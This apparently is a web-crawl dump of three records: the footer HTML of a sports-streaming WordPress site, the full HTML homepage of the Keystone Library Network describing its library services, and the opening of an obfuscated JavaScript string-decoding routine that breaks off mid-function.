href="https://freelivesports.co/12ggg/">testing</a></li> </ul> </aside> </div><!-- #secondary .widget-area --> <div id="tertiary" class="widget-area" role="supplementary"> <aside id="text-7" class="widget widget_text"> <div class="textwidget"><div class="dailymotion-widget" data-placement="5648c40220d8bb00174b2b31"></div><script>(function(w,d,s,u,n,e,c){w.PXLObject = n; w[n] = w[n] || function(){(w[n].q = w[n].q || []).push(arguments);};w[n].l = 1 * new Date();e = d.createElement(s); e.async = 1; e.src = u;c = d.getElementsByTagName(s)[0]; c.parentNode.insertBefore(e,c);})(window, document, "script", "//api.dmcdn.net/pxl/client.js", "pxl");</script></div> </aside> </div><!-- #tertiary .widget-area --> </div><!-- #main .site-main --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="section group"> <div class="col span_1_of_3"> <div id="text-3" class="widget widget_text"><h4>ToS</h4> <div class="textwidget">FreeLiveSports is committed to searching for and embedding-linking to free online sport videos that our visitors can watch. All the videos shown here were found as free on the internet and are located on third party servers. FreeLiveSports uses the technology called embedding to show the videos to its users directly, but we haven't created the videos and we don't own them.</div> </div> </div> <div class="col span_1_of_3"> <div id="recent-posts-2" class="widget widget_recent_entries"> <h4>Recent Posts</h4> <ul> <li> <a href="https://freelivesports.co/dillian-whyte-v-dereck-chisora/">Dillian Whyte v Dereck Chisora</a> </li> <li> <a href="https://freelivesports.co/watford-v-everton/">Watford v Everton Live Stream</a> </li> <li> <a href="https://freelivesports.co/joseph-parker-vs-andy-ruiz-jr/">Joseph Parker vs Andy Ruiz Jr Live Stream</a> </li> <li> <a href="https://freelivesports.co/anthony-joshua-vs-eric-molina/">Anthony Joshua vs Eric Molina</a> </li> <li> <a href="https://freelivesports.co/ufc-205-alvarez-vs-mcgregor/">UFC 205: Alvarez vs McGregor</a> </li> </ul> </div> </div> <div class="col span_1_of_3"> <div id="search-2" class="widget widget_search"><h4>Search</h4> <form method="get" id="searchform" action="https://freelivesports.co/" role="search"> <label for="s" class="assistive-text">Search</label> <input type="text" class="field" name="s" value="" id="s" placeholder="Search &hellip;" /> <input type="submit" class="submit" name="submit" id="searchsubmit" value="Search" /> </form> </div> </div> </div> <div class="site-info"> <a href="http://www.templateexpress.com/sporty-theme/"> Sporty free WordPress Sports Theme</a> Powered By WordPress </div><!-- .site-info --> </footer><!-- #colophon .site-footer --> <a href="#top" id="smoothup"></a> </div><!-- #page .hfeed .site --> </div><!-- end of wrapper --> <!-- Start of StatCounter Code --> <script> <!-- var sc_project=10496710; var sc_security="ed361130"; var sc_invisible=1; var scJsHost = (("https:" == document.location.protocol) ? "https://secure." : "http://www."); //--> </script> <script type="text/javascript" src="https://secure.statcounter.com/counter/counter.js" async></script> <noscript><div class="statcounter"><a title="web analytics" href="https://statcounter.com/"><img class="statcounter" src="https://c.statcounter.com/10496710/0/ed361130/1/" alt="web analytics" /></a></div></noscript> <!-- End of StatCounter Code --> <script type='text/javascript' src='https://freelivesports.co/wp-content/themes/sporty/js/small-menu.js?ver=20120207'></script> <script type='text/javascript' src='https://freelivesports.co/wp-content/themes/sporty/js/smoothscroll.js?ver=5.0.4'></script> <script type='text/javascript' src='https://freelivesports.co/wp-includes/js/wp-embed.min.js?ver=5.0.4'></script> </body> </html> <!-- Dynamic page generated in 0.491 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 15:30:39 --> <!-- Compression = gzip -->
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.klnpa.org/xmlrpc.php"> <title>Keystone Library Network</title> <!-- This site is optimized with the Yoast SEO plugin v9.6 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://www.klnpa.org/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Keystone Library Network" /> <meta property="og:description" content="The Keystone Library Network is a consortium of academic and research libraries. The network provides members with access to a number of services, which are briefly described below. Images and links in each description lead to pages with more detail. Information about the network can be found on the About KLN page and details about &hellip;" /> <meta property="og:url" content="https://www.klnpa.org/" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.klnpa.org/#website","url":"https://www.klnpa.org/","name":"","potentialAction":{"@type":"SearchAction","target":"https://www.klnpa.org/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Feed" href="https://www.klnpa.org/feed/" /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="https://www.klnpa.org/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Keystone Library Network Comments Feed" href="https://www.klnpa.org/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.klnpa.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.klnpa.org/wp-includes/css/dist/block-library/style.min.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='simple-staff-list-css' href='https://www.klnpa.org/wp-content/plugins/simple-staff-list/public/css/simple-staff-list-public.css?ver=2.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='staff-list-custom-css-css' href='https://www.klnpa.org/wp-content/themes/gillian/simple-staff-list-custom.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='gillian-style-css' href='https://www.klnpa.org/wp-content/themes/gillian/style.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='gillian-gf-droidsans-css' href='//fonts.googleapis.com/css?family=Droid+Sans%3A400%2C700%2C300%2C400italic%2C700italic&#038;ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='gillian-gf-droidserif-css' href='//fonts.googleapis.com/css?family=Droid+Serif%3A400%2C400italic%2C700%2C700italic&#038;ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://www.klnpa.org/wp-content/themes/gillian/fontawesome/css/font-awesome.min.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='tablepress-default-css' href='https://www.klnpa.org/wp-content/tablepress-combined.min.css?ver=34' type='text/css' media='all' /> <script type='text/javascript' src='https://www.klnpa.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script> <link rel='https://api.w.org/' href='https://www.klnpa.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.klnpa.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.klnpa.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.0.4" /> <link rel='shortlink' href='https://www.klnpa.org/' /> <link rel="alternate" type="application/json+oembed" href="https://www.klnpa.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.klnpa.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.klnpa.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.klnpa.org%2F&#038;format=xml" /> <style type="text/css"> /* Content: Link color */ .site-main a:link, .site-main a:visited { color: #3b68d3; } a.page-numbers:hover, a.page-numbers:focus, .nav-links a:hover, .nav-links a:focus { color: #3b68d3!important; } </style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f7f7f7; } </style> </head> <body class="home page-template page-template-page-templates page-template-threecolumn page-template-page-templatesthreecolumn-php page page-id-13 custom-background"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header" role="banner" class="header-bar header-background-image" style="background-image: url('https://www.klnpa.org/wp-content/uploads/2017/09/kln_header.jpg')"> <div class="header-bar"> <div class="site-branding"> <p class="site-title"><a href="https://www.klnpa.org/" rel="home"></a></p> </div><!-- .site-branding --> <div class="header-search"> <form role="search" method="get" class="search-form" action="https://www.klnpa.org/"> <label for="search-form-5cdd90838d320"> <span class="screen-reader-text">Search for</span> </label> <input type="search" id="search-form-5cdd90838d320" class="search-field" placeholder="Search" value="" name="s" /> <button type="submit" class="search-submit"><span class="fa fa-search" aria-hidden="true"></span><span class="screen-reader-text">Search</span></button> </form> </div> <!-- .header-search --> </div> <!-- .header-bar --> <nav id="site-navigation" class="main-navigation bottom-navigation" role="navigation" aria-label="Primary Navigation"> <div class="bottom-menu"> <button class="menu-toggle" aria-controls="bottom-menu" aria-expanded="false">Menu</button> <div class="menu-custom-menu-container"><ul id="bottom-menu" class="menu"><li id="menu-item-706" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-13 current_page_item menu-item-706"><a title="Keystone Library Network" href="https://www.klnpa.org/">Home</a></li> <li id="menu-item-134" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-134"><a href="/klnpa/services/">Services</a> <ul class="sub-menu"> <li id="menu-item-1482" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1482"><a href="https://www.klnpa.org/primo-library-catalogs/">Alma/Primo</a></li> <li id="menu-item-1381" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1381"><a href="https://www.klnpa.org/archives-space/">ArchivesSpace</a></li> <li id="menu-item-160" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-160"><a href="/contentdm/">CONTENTdm</a></li> <li id="menu-item-485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="/islandora/">Islandora</a></li> <li id="menu-item-291" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-291"><a href="/kln-lists/">KLNLists</a></li> <li id="menu-item-138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-138"><a href="/rpas/">RPAS</a></li> </ul> </li> <li id="menu-item-1535" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1535"><a href="https://www.klnpa.org/for-site-admins/">For Site Admins</a> <ul class="sub-menu"> <li id="menu-item-1266" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1266"><a href="https://www.klnpa.org/contact-hub/">Contact KLN</a></li> <li id="menu-item-1025" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1025"><a title="Open Support Ticket" href="https://tickets.klnpa.org/">Submit Support Ticket</a></li> <li id="menu-item-1513" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1513"><a href="https://www.klnpa.org/alma-links/">Alma Links</a></li> <li id="menu-item-1538" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1538"><a href="https://www.klnpa.org/primo-library-catalogs/">Primo Links</a></li> <li id="menu-item-1633" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1633"><a href="https://www.klnpa.org/islandora-links/">Islandora Links</a></li> <li id="menu-item-1637" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1637"><a href="https://www.klnpa.org/kln-lists/">Keystone Library Network Mailing Lists</a></li> <li id="menu-item-1624" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1624"><a href="https://www.klnpa.org/islandora-webinar-notes/">Islandora Webinar Notes</a></li> <li id="menu-item-1422" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1422"><a href="https://www.klnpa.org/remote-authentication-ezproxy-overview/">RPAS/EZproxy Overview</a></li> <li id="menu-item-1427" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1427"><a href="https://www.klnpa.org/rpas-vs-ezproxy/">RPAS vs EZproxy</a></li> <li id="menu-item-1424" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1424"><a href="https://www.klnpa.org/rpas-info/">EZproxy Information</a></li> <li id="menu-item-1425" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1425"><a href="https://www.klnpa.org/remote/">EZproxy for a New Database</a></li> <li id="menu-item-1423" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1423"><a href="https://www.klnpa.org/create-ezproxy-links/">Creating EZproxy Links</a></li> <li id="menu-item-1426" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1426"><a href="https://www.klnpa.org/testing-ezproxy-links/">Testing EZproxy Links</a></li> <li id="menu-item-852" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-852"><a href="https://www.klnpa.org/helpful_rpas_ezproxy_links/">Helpful RPAS/Ezproxy Links</a></li> <li id="menu-item-1557" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1557"><a href="https://www.klnpa.org/z39-50-setup-info-alma/">Z39.50 Setup Info for Alma</a></li> <li id="menu-item-1561" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1561"><a href="https://www.klnpa.org/firstsearch/">FirstSearch</a></li> </ul> </li> <li id="menu-item-41" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-41"><a href="/klnpa/about/">About KLN</a> <ul class="sub-menu"> <li id="menu-item-226" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-226"><a href="/klnpa/datacenter/">Datacenter</a></li> <li id="menu-item-1244" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1244"><a href="https://www.klnpa.org/faq/">FAQ</a></li> <li id="menu-item-42" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-42"><a href="/klnpa/staff/">Staff</a></li> <li id="menu-item-283" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-283"><a href="/klnpa/site-admins/">Site Admin Contacts</a></li> <li id="menu-item-1328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1328"><a href="https://www.klnpa.org/primo-contacts/">Primo Contacts</a></li> <li id="menu-item-1015" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1015"><a href="https://www.klnpa.org/tutorials/">Tutorials</a></li> </ul> </li> <li id="menu-item-67" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-67"><a href="/klnpa/membership/">Membership</a> <ul class="sub-menu"> <li id="menu-item-232" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-232"><a href="/klnpa/member-libraries/">Member Libraries</a></li> <li id="menu-item-1011" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1011"><a href="https://secure.passhe.edu/asa/kln/Pages/default.aspx">Members Only</a></li> </ul> </li> </ul></div> </div> </nav><!-- #site-navigation --> </header><!-- #masthead --> <div id="content" class="site-content"> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <article id="post-13" class="post-13 page type-page status-publish hentry"> <header class="entry-header "> <h1 class="entry-title">Keystone Library Network</h1> </header><!-- .entry-header --> <div class="entry-content"> <p>The <strong>Keystone Library Network</strong> is a consortium of <a href="/klnpa/member-libraries/">academic and research libraries</a>. The network provides members with access to a number of services, which are briefly described below. Images and links in each description lead to pages with more detail.</p> <p>Information about the network can be found on the <a href="https://www.klnpa.org/about/">About KLN </a>page and details about membership can be found on the<a href="https://www.klnpa.org/membership/"> Membership </a>page. To contact the network staff, please see the <a href="https://www.klnpa.org/contact-hub/">How to Contact </a>page.</p> <p><a href="https://www.klnpa.org/almaprimo/"><img class="wp-image-1486 alignleft" src="https://www.klnpa.org/wp-content/uploads/2017/08/alma2.jpg" alt="" width="254" height="71" /></a>Ex Libris next-generation integrated library services platform. Read <a href="https://www.klnpa.org/almaprimo/">more details</a> and access <a href="https://www.klnpa.org/primo-library-catalogs/">Primo library catalogs</a>.</p> <p>&nbsp;</p> <p><a href="https://www.klnpa.org/rpas/"><img class="wp-image-1230 alignleft" src="https://www.klnpa.org/wp-content/uploads/2013/07/remote-patron-authentication.jpg" alt="" width="219" height="227" /></a></p> <p>&nbsp;</p> <p><a href="https://www.klnpa.org/rpas/">Remote Patron Authentication System (RPAS) with Ezproxy</a>  allows you to create direct links to resources including databases, journals, and articles.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><a href="https://www.klnpa.org/wp-content/uploads/2017/08/aspace_icon.jpg"><img class="size-full wp-image-1388 alignleft" src="https://www.klnpa.org/wp-content/uploads/2017/08/aspace_icon.jpg" alt="" width="197" height="133" /></a></p> <p>Built for archives by archivists, <a href="https://www.klnpa.org/archives-space/">ArchivesSpace</a> is the open source archives information management application for managing and providing web access to archives, manuscripts, and digital objects.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><a href="https://www.klnpa.org/islandora/"><img class="wp-image-1229 alignleft" src="https://www.klnpa.org/wp-content/uploads/2013/07/islandora.jpg" alt="" width="319" height="134" /></a> <a href="https://www.klnpa.org/islandora/">Islandora</a> is an open-source software framework designed to help institutions, organizations, and their audiences collaboratively manage and discover digital assets using a best-practices framework.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><a href="https://www.klnpa.org/contentdm/"><img class="alignleft wp-image-1228" src="https://www.klnpa.org/wp-content/uploads/2013/07/contentdm.jpg" alt="CONTENTdm logo" width="337" height="65" /></a><a href="https://www.klnpa.org/contentdm/">Contentdm</a> is a digital collection management system consisting of a server on which content is stored, a web-based content discovery interface, and tools to upload and manage content.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><span style="font-size: 0.85em;">Current <a href="/klnpa/member-libraries/">Member Libraries</a></span></p> </div><!-- .entry-content --> <footer class="entry-footer"> </footer><!-- .entry-footer --> </article><!-- #post-## --> <div id="comments" class="comments-area"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/#respond" style="display:none;">Cancel reply</a></small></h3><p class="must-log-in">You must be <a href="https://www.klnpa.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.klnpa.org%2F">logged in</a> to post a comment.</p> </div><!-- #respond --> </div><!-- #comments --> </main><!-- #main --> </div><!-- #primary --> <aside id="three-columns-sidebar" class="widget-area sidebar" role="complementary" aria-label="Three columns sidebar"> <section id="nav_menu-5" class="widget widget_nav_menu"><div class="menu-custom-menu-container"><ul id="menu-custom-menu" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-13 current_page_item menu-item-706"><a title="Keystone Library Network" href="https://www.klnpa.org/">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-134"><a href="/klnpa/services/">Services</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1482"><a href="https://www.klnpa.org/primo-library-catalogs/">Alma/Primo</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1381"><a href="https://www.klnpa.org/archives-space/">ArchivesSpace</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-160"><a href="/contentdm/">CONTENTdm</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="/islandora/">Islandora</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-291"><a href="/kln-lists/">KLNLists</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-138"><a href="/rpas/">RPAS</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1535"><a href="https://www.klnpa.org/for-site-admins/">For Site Admins</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1266"><a href="https://www.klnpa.org/contact-hub/">Contact KLN</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1025"><a title="Open Support Ticket" href="https://tickets.klnpa.org/">Submit Support Ticket</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1513"><a href="https://www.klnpa.org/alma-links/">Alma Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1538"><a href="https://www.klnpa.org/primo-library-catalogs/">Primo Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1633"><a href="https://www.klnpa.org/islandora-links/">Islandora Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1637"><a href="https://www.klnpa.org/kln-lists/">Keystone Library Network Mailing Lists</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1624"><a href="https://www.klnpa.org/islandora-webinar-notes/">Islandora Webinar Notes</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1422"><a href="https://www.klnpa.org/remote-authentication-ezproxy-overview/">RPAS/EZproxy Overview</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1427"><a href="https://www.klnpa.org/rpas-vs-ezproxy/">RPAS vs EZproxy</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1424"><a href="https://www.klnpa.org/rpas-info/">EZproxy Information</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1425"><a href="https://www.klnpa.org/remote/">EZproxy for a New Database</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1423"><a href="https://www.klnpa.org/create-ezproxy-links/">Creating EZproxy Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1426"><a href="https://www.klnpa.org/testing-ezproxy-links/">Testing EZproxy Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-852"><a href="https://www.klnpa.org/helpful_rpas_ezproxy_links/">Helpful RPAS/Ezproxy Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1557"><a href="https://www.klnpa.org/z39-50-setup-info-alma/">Z39.50 Setup Info for Alma</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1561"><a href="https://www.klnpa.org/firstsearch/">FirstSearch</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-41"><a href="/klnpa/about/">About KLN</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-226"><a href="/klnpa/datacenter/">Datacenter</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1244"><a href="https://www.klnpa.org/faq/">FAQ</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-42"><a href="/klnpa/staff/">Staff</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-283"><a href="/klnpa/site-admins/">Site Admin Contacts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1328"><a href="https://www.klnpa.org/primo-contacts/">Primo Contacts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1015"><a href="https://www.klnpa.org/tutorials/">Tutorials</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-67"><a href="/klnpa/membership/">Membership</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-232"><a href="/klnpa/member-libraries/">Member Libraries</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1011"><a href="https://secure.passhe.edu/asa/kln/Pages/default.aspx">Members Only</a></li> </ul> </li> </ul></div></section></aside><!-- #three-columns-sidebar --> <aside id="secondary" class="widget-area sidebar" role="complementary" aria-label="Default sidebar"> <section id="recent-posts-4" class="widget widget_recent_entries"> <h2 class="widget-title">News/Updates</h2> <ul> <li> <a href="https://www.klnpa.org/klnc-sshelco-joint-conference-call-january-18th-1000am-1200pm/">KLNC-SSHELCO Joint Conference Call, January 18th, 10:00am-12:00pm</a> <span class="post-date">November 13, 2018</span> </li> <li> <a href="https://www.klnpa.org/klnc-call-february-8th-900am-1100am/">KLNC Call, February 8th, 9:00am-11:00am</a> <span class="post-date">November 13, 2018</span> </li> <li> <a href="https://www.klnpa.org/klnc-sshelco-meeting-april-2nd-100pm-400pm/">KLNC-SSHELCO Meeting, April 2nd, 1:00pm-4:00pm</a> <span class="post-date">November 13, 2018</span> </li> <li> <a href="https://www.klnpa.org/klnc-call-april-19th-900am-1100am/">KLNC Call, April 19th, 9:00am-11:00am</a> <span class="post-date">November 13, 2018</span> </li> <li> <a href="https://www.klnpa.org/klnc-call-may-7th-900am-1100am/">KLNC Call, May 7th, 9:00am-11:00am</a> <span class="post-date">November 13, 2018</span> </li> </ul> </section></aside><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <aside id="footer-sidebar" class="widget-area" role="complementary" aria-label="Footer widgets"> </aside> <div class="site-info"> <p>&copy; 2019 <a href="https://www.klnpa.org/" rel="home"></a> <span class="sep"></span> <a href="https://wordpress.org/">Powered by WordPress</a> <span class="sep"></span> Theme: <a href="http://wordpress.org/themes/gillian">Gillian</a> </div><!-- .site-info --> <div class="back-to-top"> <a href="#"><i class="fa fa-chevron-up" aria-hidden="true"><span class="screen-reader-text">Back to top</span></i></a> </div> <div class="clearer"></div> </footer><!-- #colophon --> </div><!-- #page --> <script> jQuery(document).ready(function () { jQuery.post('https://www.klnpa.org?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) { var s = document.createElement("script"); s.type = "text/javascript"; s.innerHTML = response; jQuery("head").append(s); }); }); </script><script type='text/javascript' src='https://www.klnpa.org/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-includes/js/masonry.min.js?ver=3.3.2'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-content/themes/gillian/js/mymasonry.js?ver=20160820'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-content/themes/gillian/js/navigation.js?ver=20151215'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-content/themes/gillian/js/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-content/themes/gillian/js/smooth-scroll.js?ver=20160820'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-content/themes/gillian/js/widget-img-links.js?ver=20160820'></script> <script type='text/javascript' src='https://www.klnpa.org/wp-includes/js/wp-embed.min.js?ver=5.0.4'></script> </body> </html>
1
var td_2V=td_2V||{};td_2V.td_3P=function(td_V,td_e){var td_G=[""];var td_B=0;for(var td_c=0;td_c<td_e.length;++td_c){td_G.push(String.fromCharCode(td_V.charCodeAt(td_B)^td_e.charCodeAt(td_c)));td_B++;if(td_B>=td_V.length){td_B=0; }}return td_G.join("");};td_2V.td_1r=function(td_Q){this.td_c=td_Q;this.td_d="";this.td_f=function(td_K,td_I){if(0===this.td_d.length){var td_f=this.td_c.substr(0,32);var td_L="";for(var td_A=32;td_A<td_Q.length; td_A+=2){td_L+=String.fromCharCode(parseInt(td_Q.substr(td_A,2),16));}this.td_d=td_2V.td_3P(td_f,td_L);}return this.td_d.substr(td_K,td_I);};};td_2V.td_3e=function(td_T){if(td_T===null||td_T.length===null){return null; }var td_G=null;try{var td_p="";var td_V=[];var td_m=String.fromCharCode(48)+String.fromCharCode(48)+String.fromCharCode(48);for(var td_B=0;td_B<td_T.length;++td_B){var td_c=(td_m+td_T.charCodeAt(td_B)).slice(-3); td_V.push(td_c);}var td_w=td_V.join("");for(td_B=0;td_B<td_w.length;++td_B){var td_E=String.fromCharCode(65+td_B);if(td_E!==[][[]]+""){td_p+=td_E;}}td_G=td_2V.td_3P(td_p,td_w);}catch(td_K){return null; }return 